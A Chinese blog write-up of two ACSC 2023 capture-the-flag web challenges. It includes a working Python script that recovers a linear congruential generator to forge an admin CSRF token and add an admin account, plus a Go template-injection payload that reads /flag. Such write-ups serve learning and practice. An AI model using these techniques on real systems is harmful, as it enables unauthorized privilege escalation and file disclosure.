ACSC 2023 比赛复现

最新推荐文章于 2023-03-19 10:02:21 发布
最新推荐文章于 2023-03-19 10:02:21 发布
阅读量517 收藏
点赞数
分类专栏: 比赛复现 文章标签: 比赛复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/129226442
版权

Admin Dashboard

在 index.php 中可以看到需要访问者是 admin 权限,才可以看到 flag。
在这里插入图片描述
report.php 中可以让 admin bot 访问我们输入的 url,那么也就是说可以访问 addadmin.php 添加用户。
在这里插入图片描述

在 addadmin.php 中可以添加 admin 用户,但是需要 admin 权限添加,且 csrf-token 要是 admin 用户生成的,也就是说现在万事俱备,只差 csrf-token,而这个 csrf-token 是线性同余生成的伪随机数,且我们知道了其中的,M 和 n(伪随机数),那么自然也就可以逆推出 A 和 C,也就可以伪造 admin 的 csrf-token 了,具体实现过程和函数关系,可以看看相关文章

在这里插入图片描述

import requests
import re
import time
import string
import random
import binascii

BASE = 'http://admin-dashboard.chal.ctf.acsc.asia'
#BASE = 'http://localhost:8000'
username = ''.join(random.sample(string.ascii_letters, 10))
password = ''.join(random.sample(string.ascii_letters, 10))

print(f'username -> {username}')
print(f'password -> {password}')

s = requests.Session()
s.get(BASE + '/register', params={'username':username, 'password':password})
s.get(BASE + '/login', params={'username':username, 'password':password})

x = []
for _ in range(8):		#获取8个伪随机的线性 token,用来逆推 
    t = s.get(BASE + '/addadmin').text
    token = re.findall(r'<input type=\"hidden\" name=\"csrf-token\" value=\"([0-9a-f]*)\">', t)[0]
    print(token)
    x.append(int(token, 16))

    time.sleep(35)

# ============================================

# https://satto.hatenadiary.com/entry/solve-LCG

def solve_unknown_increment(states, A, M):
    B = (states[1] - A * states[0]) % M
    return B

from Crypto.Util.number import inverse

def solve_unknown_multiplier(states, M):
    A = (states[2] - states[1]) * inverse((states[1] - states[0]), M)
    return A

from Crypto.Util.number import inverse, GCD
from functools import reduce

def solve_unknown_modulus(states):
    diffs = [X_1 - X_0 for X_0, X_1 in zip(states, states[1:])]
    multiples_of_M = [T_2 * T_0 - T_1 ** 2 for T_0, T_1, T_2, in zip(diffs, diffs[1:], diffs[2:])]

    # GCD(GCD(multiples_of_M[0],multiples_of_M[1]), multiples_of_M[2])
    M = reduce(GCD, multiples_of_M)
    return M

M = solve_unknown_modulus(x)
A = solve_unknown_multiplier(x, M)
C = solve_unknown_increment(x, A, M)

# answer
print("A = {}".format(hex(A)))
print("C = {}".format(hex(C)))
print("M = {}".format(hex(M)))

# ============================================

from Crypto.Util.number import *

assert (A * bytes_to_long(username.encode()) + C) % M == x[0]

print(hex((A * bytes_to_long('admin'.encode()) + C) % M))

获得 csrf-token 后,发送生成 admin 账户的 url,最后以 admin 权限的账户登录即可。

http://localhost/addadmin?username=waeji25fgew&password=dfgj34ijgi&csrf-token=1fe69abb084e42434627a84405d722e0

在这里插入图片描述

easySSTI

if err := t.Execute(buf, c); err != nil { 模板生成的部分,在 main.go 里面,且上下文传递的变量c是echo.Context,我们可以搜索任何从这里追踪到并可以使用的东西。

https://github.com/labstack/echo/blob/master/echo.go,发现一个叫做 Filesystem 的东西,可以用 Open 打开 File,它会返回相应文件的 fs.File。
在这里插入图片描述
然后用它自己准备的 Read,且在 main.go 中 tmpl, ok := c.Get("template").([]byte) 可以检索变量 .Get "template" 如果将其指定为保存目标,然后显示它就可以让 flag 以十进制数组来显示。
在这里插入图片描述
在这里插入图片描述

payload:

{{ (.Echo.Filesystem.Open "/flag").Read (.Get "template") }} {{.Get "template"}}

wp

https://blog.hamayanhamayan.com/entry/2023/02/26/124239
succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
matlab集成c代码-ACSC:非重复扫描固态LiDAR和摄像头系统的自动校准
05-22
Matlab集成的c代码ACSC 用于非重复扫描固态LiDAR和摄像头系统的自动外部校准。 系统架构 1.依赖 已在Ubuntu 16.04 64位和Ubuntu 18.04 64位上进行测试。 ROS(经过动力学/旋律测试) 本征3.2.5 PCL 1.8 python 2.X /...
ACSC论文分享
loganzha的博客
01-10 351
ACSC论文分享任务介绍1.Aspect Based Sentiment Analysis with Gated Convolutional Networks2.Utilizing BERT for Aspect-Based Sentiment Analysis via Constructing Auxiliary SentenceMulti-Instance Multi-Label Learning Networks for Aspect-Category Sentiment Analysis 任务介绍
acsc 函数
qpc411074777的专栏
09-02 978
acsc 函数 Inverse cosecant, result in radians 反余割,弧度中的结果。 Syntax 语法 Y = acsc(X) Description 描述 Y = acsc(X) returns the inverse cosecant (arccosecant) for each element of X. Y=acsc(X)返回X的每个元素的反余
csc和acsc--余割和反余割函数
qq_18343569的博客
12-28 2267
【功能简介】求变量的余割和反余割。 【语法格式】 1.Y=csc(X) 计算X的余割,csc(x)=1/sin(x)。X可以为向量、矩阵或多维数组,X中的元素可以为复数,所有表示角度的变量都采用弧度来表示。 2.Y=acsc (X) 计算X的反余割。对于变量x,csc-1(x)=sin-1(1/x)。 【实例5.11】计算-pi >> x1=-pi+0.01:
Matlab 使用笔记(本人出品,必属精品)
热门推荐
一些笔记
05-13 3万+
此篇博客记录了一些Matlab 的使用技巧,出于方便自己以后查阅之目的,感兴趣的朋友可以看看,本人会不定期更新的。
【专家独推】全网最全Matlab常用函数(包括按首字母进行分类)
左手の明天的博客
03-30 2万+
目录 1、求组合数 2、求阶乘 3、求全排列 4、求指数 5、求行列式 6、求矩阵的转置 7、求向量的指数 8、求自然对数 9、求矩阵的逆矩阵 10、多项式的乘法运算 11、多项式除法 12、求一个向量的最大值 13、求矩阵的最大值和最小值 14、求和与求积 15、平均值、标准方差 16、相关系数 17、排序 18、多项式的求导 19、多项式的求值 20、常用的基本数学函数 21、常用的三角函数 22、适用于向量的常用函数 23、MATLAB的永久常数 24、
SLAM本质剖析-Open3D
3D视觉工坊
12-31 677
点击上方“3D视觉工坊”,选择“星标”干货第一时间送达作者丨lovely_yoshino来源丨古月居0. 前言在深入剖析了Ceres、Eigen、Sophus、G2O后,以V-SLAM为代...
ACSC Quals 2023 - pcap 1, 2
Laffrey的专栏
03-19 396
题目下载地址:pwd=aaaa。
激光雷达和相机联合标定之开源代码和软件汇总(2004-2021)
3D视觉工坊
08-31 2558
作者丨十点雨@知乎来源丨https://zhuanlan.zhihu.com/p/404762012编辑丨3D视觉工坊LiDAR Camera Calibration (LCC)系列,主要...
计算机会议等级排名
敲代码的quant的博客
05-17 9395
转载于:https://www.cnblogs.com/bnuvincent/p/6809353.htmlAcronymStandard NameRankAAAINational Conference of the American Association for Artificial IntelligenceA+AAMASInternational Conference on Autonomou...
ACSA:用于方面类别情感分析的论文,模型和数据集
05-20
方面类别情感分析的论文,模型和数据集,包含两个细粒度的子任务:方面类别检测(ACD)和方面类别情感分类(ACSC)。 要求 python 3.6 pytorch 1.3.0 艾伦纸0.9.0 用法 支持的数据集 SemEval-2014-Task-4-LAPT ...
MATLAB函数大全 MATLAB全部函数整理 按照首字母排序 上千个函数集中整理 共18页.pdf
04-08
acsc 反余割 acsch 反双曲余割 align 启动图形对象几何位置排列工具 all 所有元素非零为真 angle 相角 ans 表达式计算结果的缺省变量名 any 所有元素非全零为真 area 面域图 argnames 函数M文件宗量名 asec 反正割 ...
PHPComplex:PHP类,用于处理复数
03-31
acsc(反余割) csch(双曲正割) acsch(反双曲正割) 棕褐色(切线) atan(反正切) tanh(双曲正切) atanh(反双曲正切) 婴儿床(余切) 算子(反余切) coth(双曲余切) 阿科斯(反双曲余切) ...
【最新+免费】MATLAB指令大全总汇详解最新发布完整珍藏版.doc
07-07
----------------------------------------------------------------------------------------------------------------Aaabs绝对值、模、字符地ASCII码值acos反余弦acosh反双曲余弦acot反余切acoth反双曲余切acsc反...
计算机专业毕业设计范例845篇jsp2118基于Web停车场管理系统的设计与实现_Servlet_MySql演示录像.rar
05-24
博主给大家详细整理了计算机毕业设计最新项目,对项目有任何疑问(部署跟文档),都可以问博主哦~ 一、JavaWeb管理系统毕设项目【计算机毕设选题】计算机毕业设计选题,500个热门选题推荐,更多作品展示 计算机毕业设计|PHP毕业设计|JSP毕业程序设计|Android毕业设计|Python设计论文|微信小程序设计
Windows 10 平台 FFmpeg 开发环境搭建 博客资源
05-24
【FFmpeg】Windows 10 平台 FFmpeg 开发环境搭建 ④ ( FFmpeg 开发库内容说明 | 创建并配置 FFmpeg 项目 | 拷贝 DLL 动态库到 SysWOW64 目录 ) https://hanshuliang.blog.csdn.net/article/details/139172564 博客资源 一、FFmpeg 开发库 1、FFmpeg 开发库编译 2、FFmpeg 开发库内容说明 二、创建并配置 FFmpeg 项目 1、拷贝 dll 动态库到 C:\Windows\SysWOW64 目录 - 必须操作 特别关注 2、创建 Qt 项目 - C 语言程序 3、配置 FFmpeg 开发库 - C 语言项目 4、创建并配置 FFmpeg 开发库 - C++ 项目
基于 Spring Cloud 、Spring Boot、 OAuth2 的 RBAC 企业快速开发平台
最新发布
05-24
基于 Spring Cloud 、Spring Boot、 OAuth2 的 RBAC 企业快速开发平台, 同时支持微服务架构和单体架构。提供对 Spring Authorization Server 生产级实践,支持多种安全授权模式。提供对常见容器化方案支持 Kubernetes、Rancher2 、Kubesphere、EDAS、SAE 支持
我赚100万的商业模式.pdf
05-24
我赚100万的商业模式
acsc_waitforasyncall
02-23
acsc_waitforasyncall是CSDN开发的C知道中的一个函数,用于等待异步调用完成。在编程中,有时候我们需要调用一些异步函数,这些函数会在后台执行,并不会立即返回结果。而acsc_waitforasyncall函数的作用就是等待这些异步函数执行完成,然后再继续执行后面的代码。 具体来说,acsc_waitforasyncall函数会阻塞当前线程,直到所有的异步调用都完成。它接受一个参数,即异步调用的标识符,通过这个标识符可以确定要等待哪个异步调用。 使用acsc_waitforasyncall函数可以确保在异步调用完成之前不会执行后续的代码,从而避免出现数据竞争或其他并发问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值